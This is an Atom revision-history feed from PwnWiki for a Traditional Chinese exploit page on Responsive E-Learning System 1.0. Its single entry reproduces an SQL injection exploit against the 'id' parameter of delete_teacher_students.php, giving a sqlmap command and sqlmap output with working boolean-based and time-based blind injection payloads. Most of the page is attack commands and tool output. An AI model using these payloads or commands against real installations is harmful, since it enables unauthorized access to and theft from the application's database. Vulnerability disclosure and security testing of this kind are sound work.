<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%2Fzh-tw</id>
	<title>Responsive E-Learning System 1.0 SQL注入漏洞/zh-tw - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%2Fzh-tw"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/zh-tw&amp;action=history"/>
	<updated>2026-04-04T02:32:03Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/zh-tw&amp;diff=6981&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==測試環境==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/zh-tw&amp;diff=6981&amp;oldid=prev"/>
		<updated>2021-07-10T10:25:17Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==測試環境==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==測試環境==&lt;br /&gt;
Windows 10/Kali Linux&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Responsive E-Learning System 1.0 – 'id' Sql Injection&lt;br /&gt;
# Date: 2020-12-24&lt;br /&gt;
# Exploit Author: Kshitiz Raj(manitorpotterk)&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&amp;amp;title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Windows 10/Kali Linux&lt;br /&gt;
&lt;br /&gt;
The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql&lt;br /&gt;
Injection.&lt;br /&gt;
&lt;br /&gt;
*Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17&lt;br /&gt;
-p &amp;lt;http://localhost/elearning/delete_teacher_students.php?id=17%0D-p&amp;gt; id&lt;br /&gt;
&lt;br /&gt;
# sqlmap -u&lt;br /&gt;
http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id&lt;br /&gt;
&lt;br /&gt;
        ___&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__H__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ___ ___[&amp;quot;]_____ ___ ___&lt;br /&gt;
{1.3.11#stable}&lt;br /&gt;
&lt;br /&gt;
|_ -| . [.]     | .'| .&lt;br /&gt;
|&lt;br /&gt;
&lt;br /&gt;
|___|_  [']_|_|_|__,|&lt;br /&gt;
_|&lt;br /&gt;
&lt;br /&gt;
      |_|V...       |_|   http://sqlmap.org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior&lt;br /&gt;
mutual consent is illegal. It is the end user's responsibility to obey all&lt;br /&gt;
applicable local, state and federal laws. Developers assume no liability&lt;br /&gt;
and are not responsible for any misuse or damage caused by this program&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[*] starting @ 08:59:01 /2020-12-24/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a&lt;br /&gt;
false positive&lt;br /&gt;
&lt;br /&gt;
GET parameter 'id' is vulnerable. Do you want to keep testing the others&lt;br /&gt;
(if any)? [y/N] y&lt;br /&gt;
&lt;br /&gt;
sqlmap identified the following injection point(s) with a total of 402&lt;br /&gt;
HTTP(s) requests:&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
Parameter: id (GET)&lt;br /&gt;
&lt;br /&gt;
    Type: boolean-based blind&lt;br /&gt;
&lt;br /&gt;
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or&lt;br /&gt;
GROUP BY clause&lt;br /&gt;
&lt;br /&gt;
    Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28&lt;br /&gt;
END))-- YDSn&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    Type: time-based blind&lt;br /&gt;
&lt;br /&gt;
    Title: MySQL &amp;gt;= 5.0.12 AND time-based blind (query SLEEP)&lt;br /&gt;
&lt;br /&gt;
    Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
[08:59:38] [INFO] the back-end DBMS is MySQL&lt;br /&gt;
&lt;br /&gt;
web application technology: PHP 7.2.34, Apache 2.4.46&lt;br /&gt;
&lt;br /&gt;
back-end DBMS: MySQL &amp;gt;= 5.0.12&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>